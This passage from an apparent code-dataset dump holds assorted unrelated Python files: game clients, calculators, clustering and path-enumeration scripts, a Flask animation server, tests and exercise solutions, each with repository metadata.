needs.\nPACKAGE_PARENT = '../..'\nSCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(),\n os.path.expanduser(__file__))))\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\nfrom lib.ai_tester import AITester\nfrom lib.dummy_ai import DummyAI\nfrom lib.johnny_ai import JohnnyAI\nfrom lib.pack_generator import PackGenerator\nfrom lib.timmy_ai import TimmyAI\n\n## Prints the usage string to stdout.\ndef print_usage():\n print('Improper arguments!\\n'\n 'Run as python3 timmy_tester.py '\n ' '\n ' '\n ' '\n '[set_file.json] '\n '[card_rankings.txt]\\n'\n '| serialized_draft_dir = the directory containing the serialized '\n 'draft data.\\n'\n '| output_draft_dir = the directory the results will be written to'\n '.\\n'\n '| tensor_flow_nn_filename = the file containing the Tensor Flow NN '\n 'used for the AI\\n'\n '| set_file.json = json filename containing the MTG cards\\n'\n '| card_rankings.txt = file containing rankings for each card\\n')\n\n## Writes a list named deck to the output file specified, with each value being\n## placed on a separate line. I know I should check return values but ehhhh.\ndef write_deck_to_file(deck, directory, file_name, name_type):\n # generate a unique filename\n # split the path to get the name from the end\n file_name = file_name.split('/')[-1]\n # get the name of the draft file\n file_name = '_'.join(file_name.split('_')[:2])\n # prepend with 'datum' or 'text'\n file_name = name_type + '_' + file_name + '.txt'\n with open(directory + file_name, 'w') as file_out:\n for card_index in deck:\n file_out.write(str(card_index) + '\\n')\n\n## Reads the contents of a file into a list and returns that list to the caller.\ndef read_file_into_list(filename):\n file_handle = open(filename, 'r')\n contents = []\n for line in file_handle:\n contents.append(line.strip().replace(' ', ''))\n file_handle.close()\n return copy.deepcopy(contents)\n\ndef main():\n if (len(sys.argv) != 4 and len(sys.argv) != 6):\n print_usage()\n sys.exit()\n\n serialized_draft_dir = sys.argv[1]\n output_dir = sys.argv[2]\n tensor_flow_nn_filename = sys.argv[3]\n\n # get the path names of all input files\n paths = glob.glob(serialized_draft_dir + '*.txt')\n\n set_file = ''\n card_rankings_file = ''\n set_file = '../../data/kaladesh/kaladesh.json'\n card_rankings_file = '../../data/kaladesh/kaladesh_pick_order.txt'\n if (len(sys.argv) == 6):\n set_file = sys.argv[4]\n card_rankings_file = sys.argv[5]\n\n ## Create PackGenerator for Kaladesh\n pack_gen = PackGenerator(set_file, card_rankings_file)\n\n ## Create an AI Core for Timmy.\n ai_core = TimmyAI(pack_gen, tensor_flow_nn_filename)\n\n ## Setup the test environment for the AI to run in.\n ai_tester = AITester(pack_gen)\n\n ai_picks = []\n datum_picks = []\n serialized_draft_data = []\n\n ## Read in the serialized_draft data.\n for file_name in paths:\n serialized_draft_data = read_file_into_list(file_name)\n\n ## Run the tests!\n datum_picks, ai_picks = ai_tester.run(ai_core, serialized_draft_data)\n\n ## Write the datum deck (the deck that was supposed to be drafted) to disk.\n write_deck_to_file(datum_picks, output_dir, file_name, 'datum')\n\n ## Write the deck the ai chose to draft to disk.\n write_deck_to_file(ai_picks, output_dir, file_name, 'test')\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/app/ai_tester/timmy_tester.py","file_name":"timmy_tester.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"251591945","text":"from __future__ import print_function #I added this because it made my life a lot easier when\n#the 'end = ...' function was added in the print function that I didn't know a nice way to do\n#in Python 2.7, so print statements must all have brackets in this version, no need in the server though\n# Echo client program\nimport socket\nimport random\nimport time\nimport os\nimport platform\n\n\nHOST = 'localhost' # The remote host\n\n# to act as a client\nPORT = 50018 # The server port\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\n\n\n# APPLICATION\n\npartnerid = -1 # no partner\nnumberbidders = 0 # will be given by server\n\n# DO SOMETHING HERE\n# you need to change this to do something much more clever\ndef determinebid(itemsinauction, partnerid, numberbidders, winnerarray, winneramount):\n #if you have no money automatically bid 0\n if myTypes['money'] == 0:\n return 0\n #Otherwise input bid and check that it's a number\n output = raw_input(\"Input bid: \").strip()\n while(not (len(output) > 0 and output.isdigit())):\n output = raw_input(\"Input bid: \")\n return int(output)\n\n# DATA\n\nmybidderid = raw_input(\"Input team / player name : \").strip() # this is the only thing that distinguishes the clients \nwhile len(mybidderid) == 0 or ' ' in mybidderid:\n mybidderid = raw_input(\"You input an empty string or included a space in your name which is not allowed (_ or / are all allowed)\\n for example Emil_And_Nischal is okay\\nInput team / player name: \").strip()\n\nmoneyleft = 100 # should change over time\nwinnerarray = [] # who won each round\nwinneramount = [] # how much they paid\n\nitemsinauction = []\nmyTypes = {'Picasso': 0, 'Rembrandt': 0, 'Van_Gogh': 0, 'Da_Vinci': 0, 'money': moneyleft}\n\n# EXECUTION\n\n# get list of items and types\ngetlistflag = 1\ns.send(str(mybidderid))\nwhile(getlistflag == 1):\n # print \"Have sent data from \", str(mybidderid)\n data = s.recv(5024)\n x = data.split(\" \")\n # print \"Have received response at \", str(mybidderid), \" of: \", ' '.join(x)\n # Receives first how many players are in the game and then all 200 items in auction\n if(x[0] != \"Not\" and len(data) != 0):\n getlistflag = 0\n numbidders = int(x[0])\n itemsinauction = x[1:]\n for index in range(len(itemsinauction)-1, -1, -1):\n print (str(index+1) + '.', itemsinauction[index])\n print ('\\n')\n else:\n time.sleep(2)\n\nwhile True:\n s.send(str(mybidderid) + ' ')\n data = s.recv(5024)\n x = data.split(\" \")\n #Wait until everyone has connected before bidding\n if (x[0] == 'wait'):\n continue\n #When everyone has connected the server knows all names\n #it can therefore transfer all the names after telling the client that it's ready\n players = []\n for player in range(1, numbidders + 1):\n players.append(x[player])\n break\n#Create initial standings for each player after everyone connected\nstandings = {name: {'Picasso': 0, 'Van_Gogh': 0, 'Rembrandt': 0, 'Da_Vinci': 0, 'money': 100} for name in players}\n# now do bids\ncontinueflag = 1\nj = 0\n#Interface stuff, looks better if I clear the screen before writing all the info\n#but I want to give people time to study the list of itemsinauction properly before\n#they start the game. So I ask them when they're ready\nraw_input(\"Hit any key to start the game: \")\nif platform.system() == 'Windows':\n os.system('cls')\nelse:\n os.system('clear')\nwhile(continueflag == 1):\n i = len(winnerarray) \n print (\"Auction round\", str(j+1) + ':\\n')\n print (\"This is everyones standings:\\n\")\n for name in players:\n print (name + ':', standings[name])\n print()\n print()\n print (\"item type: \", itemsinauction[:i])\n print (\"Won by: \", winnerarray[:i])\n print (\"Bought for:\", winneramount[:i])\n print()\n print()\n print (\"next 20 items: \", end = '')\n for add in range(20):\n print (itemsinauction[i+add+1], end = ', ')\n print ('\\n')\n print()\n print (\"your current holdings are\", standings[mybidderid], '\\n')\n print (\"Current item to be bid for is: \" + itemsinauction[i])\n bidflag = 1\n bid = determinebid(itemsinauction, partnerid, numberbidders, winnerarray, winneramount)\n s.send(str(mybidderid) + \" \" + str(bid))\n while(bidflag == 1):\n # print \"Have sent data from \", str(mybidderid)\n data = s.recv(5024)\n x = data.split(\" \")\n # print \"Have received response at \", str(mybidderid), \" of: \", ' '.join(x)\n if(x[0] != \"Not\"):\n bidflag = 0\n else:\n time.sleep(2)\n\n\n resultflag = 1\n while(resultflag == 1):\n s.send(str(mybidderid))\n # print \"Have sent data from \", str(mybidderid)\n data = s.recv(5024)\n x = data.split(\" \")\n #Wait for all bids to be received\n if (x[0] == 'wait'):\n continue\n # print \"Have received response at \", str(mybidderid), \" of: \", ' '.join(x)\n if platform.system() == 'Windows':\n os.system('cls')\n else:\n os.system('clear')\n #Check if the server told client that game is finished\n if len(x) >= 7 and x[7] == 'won.':\n continueflag = 0\n resultflag = 0\n print(data)\n print()\n print('game over')\n #Else update standings, winnerarray etc.\n if(x[0] != \"ready\") and (continueflag == 1):\n resultflag = 0\n print (data)\n # print x\n winnerarray.append(x[0])\n winneramount.append(int(x[5]))\n standings[x[0]]['money'] -= int(x[5])\n standings[x[0]][x[3]] += 1\n if (x[1] == mybidderid):\n moneyleft -= int(x[5])\n myTypes[itemsinauction[j]] += 1\n # update moneyleft, winnerarray\n else:\n time.sleep(2)\n j+= 1\n for i in range(2):\n print()\n","sub_path":"AuctionGame/auctionhumanclientemil.py","file_name":"auctionhumanclientemil.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"626266597","text":"#-*-coding:utf8-*-\n#@Time: 2019/4/28:11 PM\n#@Author: baibai\n#@File: 80peach------.py\n#@SoftWare:PyCharm\n\n\"\"\"\n题目:海滩上有一堆桃子,五只猴子来分。\n第一只猴子把这堆桃子平均分为五份,多了一个,这只猴子把多的一个扔入海中,拿走了一份。\n第二只猴子把剩下的桃子又平均分成五份,又多了一个,它同样把多的一个扔入海中,拿走了一份,\n第三、第四、第五只猴子都是这样做的,问海滩上原来最少有多少个桃子?\n---------------------------------------------------------------------\n假设在第n个猴子分完之后岸上还剩余5x+1个桃子,等着下个猴子来分\n\"\"\"\n\nnum = int(raw_input(\"please input a number of monkey:\"))\n\ndef fn(n):\n if n == num:\n return\n return","sub_path":"基础练习/80peach------.py","file_name":"80peach------.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"592963566","text":"#!/usr/bin/env python \nimport json\nimport argparse\nimport pandas as pd\nimport numpy as np\nimport nltk.stem as stem\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.cluster import KMeans\n\n\ndef main(input_fname, output_fname, num_cluster, num_samples):\n raw_data = read_raw_data(input_fname)\n \n features = pre_process(raw_data)\n \n model = clustering(features, num_cluster)\n \n write_output(raw_data, model, num_samples, output_fname)\n \ndef read_raw_data(fname):\n with open(fname) as f:\n data = json.load(f)\n df = pd.DataFrame(data)\n df.dropna(axis=0, subset=['title','text'], inplace=True)\n df.reset_index(inplace=True, drop=True)\n return df\n\ndef pre_process(raw_data):\n vectorizer = StemmedTfidfVectorizer(min_df=20, max_df=0.9, stop_words='english')\n features = vectorizer.fit_transform(raw_data['text']).toarray()\n return pd.DataFrame(features, columns=vectorizer.get_feature_names())\n\ndef clustering(features, num_cluster):\n km = KMeans(n_clusters=num_cluster, init='random', n_init=1, verbose=1)\n km.fit(features)\n return km\n\ndef write_output(raw_data, model, num_samples, fname):\n raw_data['cluster'] = model.labels_\n result = raw_data.groupby('cluster', as_index=False).apply(lambda x: x.iloc[:num_samples])\n samples = result.to_dict('records')\n with open(fname, 'w') as f:\n json.dump(samples, f, indent=4)\n\nclass StemmedTfidfVectorizer(TfidfVectorizer):\n def build_analyzer(self):\n stemmer = stem.SnowballStemmer('english')\n analyzer = super(StemmedTfidfVectorizer, self).build_analyzer()\n return lambda doc: (stemmer.stem(w) for w in analyzer(doc))\n \n\nif __name__ == '__main__':\n argparser = argparse.ArgumentParser('Cluster stories from the input file. Generate an output file with several samples for each cluster\\n')\n argparser.add_argument('-i', '--input', required=True, help='a json format input file. The file should have a list of dict, each of \\\n which has at least two attribute: title and text')\n argparser.add_argument('-o', '--output', help='output json file', required=True)\n argparser.add_argument('-c', '--clusters', type=int, default=50, help='Number of clusters to generate')\n argparser.add_argument('-s', '--samples', type=int, default=3, help='Number of samples picked in each cluster')\n args = argparser.parse_args()\n \n main(args.input, args.output, args.clusters, args.samples)\n \n","sub_path":"python/experiments/bin/experiment_clustering.py","file_name":"experiment_clustering.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"486407330","text":"print('{:=^40}'.format(' Lojas Guanabara '))\npreco = float(input('Qual o preço do produto?'))\ncondicao_pagamento = int(input('''\\033[30mQual é a condição de pagamento?\n\\033[mDigite 1: Caso queira pagar a vista em dinheiro/cheque.\nDigite 2: Caso queira pagar a vista no cartão.\nDigite 3: Caso queira pagar em até 2 vezes no cartão.\nDigite 4: Caso queira pagar em 3 vezes ou mais no cartão.'''))\n\nif condicao_pagamento == 1:\n total_pagar = preco * 0.90\n print('O total à pagar será {}'.format(total_pagar))\nelif condicao_pagamento == 2:\n total_pagar = preco * 0.95\n print('O total à pagar será {}'.format(total_pagar))\nelif condicao_pagamento == 3:\n total_pagar = preco * 1\n print('O total à pagar será {}'.format(total_pagar))\nelif condicao_pagamento == 4:\n qtd_parcela = float(input('Vai parcelar em quantas vezes?'))\n total_pagar = preco * 1.20\n valor_parcela = total_pagar/ qtd_parcela\n print('O total à pagar será {}'.format(total_pagar))\n print('O valor da parcela será {:.2f}'.format(valor_parcela))","sub_path":"basic-python/desafio044.py","file_name":"desafio044.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"17598643","text":"from tkinter import *\n\nclass Calculator():\n def __init__(self, root, WIDTH, HEIGHT):\n self.WIDTH = WIDTH\n self.HEIGHT = HEIGHT\n\n self.enter_num1 = Entry(root, width=int(WIDTH * 0.8))\n self.enter_num2 = Entry(root, width=int(WIDTH * 0.8))\n self.addition_button = Button(root, command=eval('self.addition'), text='+')\n self.subtraction_button = Button(root, command=eval('self.subtraction'), text='-')\n self.multiplication_button = Button(root, command=eval('self.multiplication'),text='*')\n self.division_button = Button(root,command=eval('self.division') ,text='/')\n self.answer_field = Label(root)\n\n self.enter_num1.pack()\n self.enter_num2.pack()\n self.addition_button.pack()\n self.subtraction_button.pack()\n self.multiplication_button.pack()\n self.division_button.pack()\n self.answer_field.pack()\n\n def addition(self):\n try:\n self.answer_field['text'] = str(float(self.enter_num1.get()) + float(self.enter_num2.get()))\n except ValueError:\n self.answer_field['text'] = str('Введите число')\n \n def subtraction(self):\n try:\n self.answer_field['text'] = str(float(self.enter_num1.get()) - float(self.enter_num2.get()))\n except ValueError:\n self.answer_field['text'] = str('Введите число')\n\n def division(self):\n try:\n self.answer_field['text'] = str(float(self.enter_num1.get()) / float(self.enter_num2.get()))\n except ValueError:\n self.answer_field['text'] = str('Введите число')\n except ZeroDivisionError:\n self.answer_field['text'] = str('Деление на ноль невозможно')\n\n def multiplication(self):\n try:\n self.answer_field['text'] = str(float(self.enter_num1.get()) * float(self.enter_num2.get()))\n except ValueError:\n self.answer_field['text'] = str('Введите число')\n\ndef main():\n root = Tk()\n\n WIDTH = 250\n HEIGHT = 300\n\n root.title('Calculator')\n root.geometry(f'{WIDTH}x{HEIGHT}')\n\n calculator = Calculator(root, WIDTH, HEIGHT)\n root.mainloop()\n\nif __name__ == \"__main__\":\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"326920922","text":"#Leetcode problem Number 831\n#Masking Personal Information\n\nimport re\n\nclass Solution:\n def maskPII(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n li = [0,1,2,3,4,5,6,7,8,9]\n for i in range(0,len(S)):\n if S[i]=='@':\n count = 1\n pos = i \n break\n else:\n count = 0\n if count==1:\n S = S.lower()\n return S[0]+5*\"*\"+S[pos-1]+S[pos:]\n else:\n num = \"\".join(list(filter(str.isdigit,S)))\n if len(num)==10:\n return \"***-***-\"+num[6:]\n else:\n x = len(num)-10\n st = \"+\"+x*\"*\"+\"-\"\n return st+\"***-***-\"+num[len(num)-4:]\n","sub_path":"maskingPersonalInformation.py","file_name":"maskingPersonalInformation.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"167347469","text":"\nimport os\nimport re\nimport acm\nimport time\nimport glob\nimport ctypes\nimport getpass\nimport FAptReportCommon\nimport FAptReportUtils\nimport xml.etree.cElementTree as ElementTree\nfrom subprocess import Popen, call, PIPE\n \n\nclass FAptUserPreferences(object):\n USER_PREFERENCES_XML = 'APTUserPreferences'\n APTPRO_EXE = 'APTPro.exe'\n APT_PATH = 'APT_INSTALLATION_PATH'\n APT_MODELS_PATH = 'APT_MODELS_PATH'\n\n def __init__(self):\n self.hndws = []\n self.app_data_apt_path = self.get_app_data_apt_path()\n\n def foreach_window(self, hwnd, lParam):\n GetWindowText = ctypes.windll.user32.GetWindowTextW\n GetWindowTextLength = ctypes.windll.user32.GetWindowTextLengthW\n IsWindowVisible = ctypes.windll.user32.IsWindowVisible\n length = GetWindowTextLength(hwnd)\n buff = ctypes.create_unicode_buffer(length + 1)\n GetWindowText(hwnd, buff, length + 1)\n if IsWindowVisible(hwnd):\n if ('APTPro') in buff.value:\n self.hndws.append(hwnd)\n return False\n return True\n\n def hide_window(self):\n EnumWindows = ctypes.windll.user32.EnumWindows\n EnumWindowsProc = ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int))\n EnumWindows(EnumWindowsProc(self.foreach_window), 0)\n\n def run(self, command, exe):\n p = Popen(command, shell=False, executable=exe, stdout=PIPE, stderr=PIPE)\n while not self.hndws:\n self.hide_window()\n SetWindowPos = ctypes.windll.user32.SetWindowPos\n TOGGLE_HIDEWINDOW = 0x80\n for hwnd in self.hndws:\n SetWindowPos(hwnd, 0, 0, 0, 0, 0, TOGGLE_HIDEWINDOW)\n time.sleep(1)\n p.kill()\n self.write_apt_user_preferences_file()\n return p.communicate()\n\n def write_file(self, user_preferences_path):\n with open(user_preferences_path, 'w') as f:\n context = acm.GetDefaultContext()\n preferences = str(context.GetExtension(\"FStringResource\", \"FObject\", self.USER_PREFERENCES_XML).Value())\n ads = ''.join((FAptReportUtils.FAptPath.get_customer_name(), '$'))\n user = getpass.getuser()\n preferences = re.sub('\\*\\*\\*\\*', user, preferences)\n preferences = re.sub('####', ads, preferences)\n f.write(preferences)\n f.close()\n \n def get_app_data_apt_path(self):\n app_data_path = FAptReportCommon.AptDatabasePath.get_csidl_appdata_path()\n return os.path.join(app_data_path, 'APT\\APTPro\\*')\n\n def write_apt_user_preferences_file(self):\n for path in glob.glob(self.app_data_apt_path):\n user_preferences_path = os.path.join(path, FAptReportCommon.AptDatabasePath.USER_PREFERENCES_FILE)\n self.write_file(user_preferences_path)\n \n @classmethod\n def get_apt_exe_path(cls):\n apt_path = FAptReportUtils.FAptReportParameters().get(cls.APT_PATH)\n os.chdir(apt_path)\n apt_exe_path = None\n for dirpath, dirnames, filenames in os.walk(os.getcwd()):\n if apt_exe_path:\n break\n for filename in (f for f in filenames if f == '%s' % cls.APTPRO_EXE):\n apt_exe_path = os.path.join(dirpath, filename)\n return apt_exe_path\n \n def user_preferences_exists(self):\n for path in glob.glob(self.app_data_apt_path):\n user_preferences_path = os.path.join(path, FAptReportCommon.AptDatabasePath.USER_PREFERENCES_FILE)\n if not os.path.exists(user_preferences_path):\n return 0\n return 1\n\n def create(self):\n if not self.user_preferences_exists():\n try:\n apt_exe_path = self.get_apt_exe_path()\n self.run(apt_exe_path, None)\n except Exception as err:\n raise err\n","sub_path":"Extensions/AMI APT/FPythonCode/FAptUserPreferences.py","file_name":"FAptUserPreferences.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"156942777","text":"from guillotina.component import queryMultiAdapter\nfrom guillotina.interfaces import IResourceFieldDeserializer\nfrom guillotina.interfaces import IResourceFieldSerializer\n\n\nasync def test_serialize_cloud_file(dummy_request):\n from guillotina.test_package import IFileContent, FileContent, CloudFile\n obj = FileContent()\n obj.file = CloudFile(filename='foobar.json', size=25, md5='foobar')\n # deserializer = queryMultiAdapter(\n # (IFile['file'], obj, dummy_request),\n # IResourceFieldDeserializer)\n # value = deserializer(data_value)\n serializer = queryMultiAdapter(\n (IFileContent['file'], obj, dummy_request),\n IResourceFieldSerializer)\n value = await serializer()\n assert value['filename'] == 'foobar.json'\n assert value['size'] == 25\n assert value['md5'] == 'foobar'\n\n\nasync def test_deserialize_cloud_file(dummy_request):\n from guillotina.test_package import IFileContent, FileContent, CloudFile\n obj = FileContent()\n deserializer = queryMultiAdapter(\n (IFileContent['file'], obj, dummy_request),\n IResourceFieldDeserializer)\n value = deserializer({\n 'filename': 'foobar.json',\n 'size': 25,\n 'md5': 'foobar'\n })\n\n assert isinstance(value, CloudFile)\n assert value.size == 25\n assert value.filename == 'foobar.json'\n assert value.md5 == 'foobar'\n","sub_path":"guillotina/tests/test_serialize.py","file_name":"test_serialize.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631183421","text":"class Solution:\n def leastInterval(self, tasks: List[str], n: int) -> int:\n t_map = [0] * 26\n for t in tasks:\n t_map[ord(t) - ord(\"A\")] += 1\n t_map.sort()\n # max_num 为最高次数,cnt 为最高次数的任务种类\n max_num, cnt = t_map[25], 0\n for i in range(26):\n if t_map[i] == max_num:\n cnt += 1\n return max((max_num - 1) * (n + 1) + cnt, len(tasks))\n","sub_path":"code/ch15/15.3.1.task-scheduler.py","file_name":"15.3.1.task-scheduler.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"179752227","text":"from flask import Flask, render_template, Response\nfrom flask_cors import CORS\nimport io\nimport numpy\nfrom PIL import Image\nimport time\n\nfrom ailive.config import cf\nfrom ailive.animate import Animator\nfrom ailive.modifiers import *\n\n\napp = Flask(__name__)\nCORS(app)\n\nanimator = Animator(cf.model, cf.audio)\n\nmodifiers = {\n 'white': White(100),\n 'grey': Greyscale(100),\n 'black': Black(100),\n 'filter': Filter(100),\n}\nmodifiers['black'].it = 100\nmodifiers['black'].reverse = True\n\n\ndef gen():\n for i in animator:\n i = i * 255\n shape = i.shape\n\n for k in modifiers:\n i = modifiers[k](i)\n\n multiplier = round(\n (1 - cf.flask.padding) * animator.screen_width / i.shape[1]\n )\n\n i = i.astype(numpy.uint8)\n i = Image.fromarray(i)\n i = i.resize((shape[1] * multiplier, shape[0] * multiplier))\n buf = io.BytesIO()\n i.save(buf, format='JPEG')\n frame = buf.getvalue()\n\n yield (b'--frame\\r \\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen(),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n@app.route('/modify/')\ndef modify(key):\n modifiers[key].reverse = False\n return 'ok'\n\n\n@app.route('/set-transition-len/')\ndef set_transition_len(steps):\n steps = int(steps)\n for k in modifiers:\n modifiers[k].n_steps = steps\n return 'ok'\n\n\n@app.route('/reset/')\ndef reset(key):\n modifiers[key].reverse = True\n return 'ok'\n\n\n@app.route('/pause/')\ndef pause(key):\n modifiers[key].done = True\n return 'ok'\n\n\n@app.route('/press/')\ndef press(key):\n animator.press(key)\n return 'ok'\n\n\n@app.route('/set-sensitivity/')\ndef set_sensitivity(level):\n animator.sensitivity = float(level)\n return 'ok'\n\n\n@app.route('/set-normalizer/')\ndef set_normalizer(level):\n animator.normalizer = float(level)\n return 'ok'\n\n\n@app.route('/set-walk-speed/')\ndef set_walk_speed(speed):\n speed = float(speed)\n if speed == 0:\n animator.random_walk = False\n else:\n window_size = int(10. / speed)\n print('window_size is ' + str(window_size))\n animator.random_walk = True\n animator.n_steps = (window_size / animator.walk_steps) * animator.n_steps\n animator.walk_steps = window_size\n return 'ok'\n\n\n@app.route('/controls')\ndef controls():\n return render_template('index.html', model_names=list(cf.flask.model_cfs.keys()))\n\n\n@app.route('/change-model/')\ndef change_model(name):\n animator.model_cf = cf.flask.model_cfs[name]\n return 'ok'\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True, use_reloader=False)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"630268257","text":"import os\r\nfrom PIL import Image\r\nimport json\r\ntypes = ['.jpg','.png','jpeg','ico','.gif']\r\nroot = os.path.abspath(os.path.dirname(__file__))\r\njsonString = []\r\nfor file in os.listdir(os.path.join(root, 'covers')):\r\n\tif os.path.splitext(file)[-1] in types:\r\n\t\timgSize = Image.open(os.path.join(root, 'covers', file)).size\r\n\t\tjsonString.append(\"{0}.{1} {2}\".format(imgSize[0],imgSize[1],file))\r\njsonString = json.dumps(jsonString, indent=4).encode().decode(\"unicode_escape\")\r\nwith open(os.path.join(root, 'coverslist.json'), 'w', encoding=\"utf-8\") as f:\r\n\tf.write(jsonString)\r\n","sub_path":"images/static/covertool.py","file_name":"covertool.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"11925178","text":"import numpy as np\n\nthreshold = 0.15\n\n\ndef SimThreshold(A):\n # 进行阈值处理,小于阈值的相似度置为0\n rows, cols = A.shape\n for i in range(rows):\n for j in range(cols):\n if A[i, j] <= threshold:\n A[i, j] = 0\n print(\"相似度阈值处理完毕\")\n return A\n\n\n# Wrr = np.loadtxt(\"Datasets//drug_drug_sim.txt\")\n# Wdd = np.loadtxt(\"Datasets//disease_similarity.txt\")\n# Wrd = np.loadtxt(\"Datasets//drug_disease_noname.txt\")\nWrr = np.loadtxt(\"Datasets//DrugSimMat\")\nWdd = np.loadtxt(\"Datasets//DiseaseSimMat\")\nWrd = np.loadtxt(\"Datasets//DiDrAMat\").T\n\nWrr = SimThreshold(Wrr)\nWdd = SimThreshold(Wdd)\n\npath = []\ndrugNum = Wrr.shape[0]\ndiseaseNum = Wdd.shape[0]\nfile = open(\"Output\\\\data.txt\", \"a\")\n# 1.R-R-D\nprint(\"开始分析路径类型1\")\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第1次路径分析第\" + str(Rs) + \"个药物\")\n for R1 in range(drugNum):\n if Rs != R1 and Wrr[Rs, R1] != 0: # 走到R1(跳过Rs)\n for Dt in range(diseaseNum):\n if Wrd[R1, Dt] == 1: # 走到Dt\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(1, Rs, R1, Dt, 9999))\n file.close()\n\n# 2.R-D-D\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第2次路径分析第\" + str(Rs) + \"个药物\")\n for D1 in range(diseaseNum):\n if Wrd[Rs, D1] != 0: # 走到D1\n for Dt in range(diseaseNum):\n if Dt != D1 and Wdd[D1, Dt] != 0: # 走到Dt(跳过D1)\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(2, Rs, D1, Dt, 9999))\n file.close()\n\n# 3.R-R-D-D\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第3次路径分析第\" + str(Rs) + \"个药物\")\n for R1 in range(drugNum):\n if R1 != Rs and Wrr[Rs, R1] != 0: # 走到R1(跳过Rs)\n for D1 in range(diseaseNum):\n if Wrd[R1, D1] != 0: # 走到D1\n for Dt in range(diseaseNum):\n if Dt != D1 and Wdd[Dt, D1] != 0: # 走到Dt\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(3, Rs, R1, D1, Dt))\n file.close()\n\n# 4.R-D-R-D\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第4次路径分析第\" + str(Rs) + \"个药物\")\n for D1 in range(diseaseNum):\n if Wrd[Rs, D1] != 0: # 走到D1\n for R1 in range(drugNum):\n if R1 != Rs and Wrd[R1, D1] != 0: # 走到R1\n for Dt in range(diseaseNum):\n if Dt != D1 and Wrd[R1, Dt] != 0: # 走到Dt\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(4, Rs, D1, R1, Dt))\n file.close()\n\n# 5.R-R-R-D\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第5次路径分析第\" + str(Rs) + \"个药物\")\n for R1 in range(drugNum):\n if Rs != R1 and Wrr[Rs, R1] != 0: # 走到R1\n for R2 in range(drugNum):\n if Rs != R1 != R2 and Rs != R2 and Wrr[R1, R2] != 0: # 走到R2\n for Dt in range(diseaseNum):\n if Wrd[R2, Dt] != 0: # 走到Dt\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(5, Rs, R1, R2, Dt))\n file.close()\n\n# 6.R-D-D-D\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第6次路径分析第\" + str(Rs) + \"个药物\")\n for D1 in range(diseaseNum):\n if Wrd[Rs, D1] != 0: # 走到D1\n for D2 in range(diseaseNum):\n if D1 != D2 and Wdd[D1, D2] != 0: # 走到D2\n for Dt in range(diseaseNum):\n if D1 != D2 != Dt and D1 != Dt and Wdd[D2, Dt] != 0: # 走到Dt\n file = open(\"PrFd0.2\\\\(\" + str(Rs) + \")\\\\\" + str(Dt) + \".txt\", \"a+\")\n file.write('{} {} {} {} {}\\n'.format(6, Rs, D1, D2, Dt))\n file.close()\n","sub_path":"201808/LSTM/PathEnum.py","file_name":"PathEnum.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"133989297","text":"# Написать программу, в которой вводятся два операнда Х и Y\n# и знак операции sign (+, –, /, *). Вычислить результат Z в\n# зависимости от 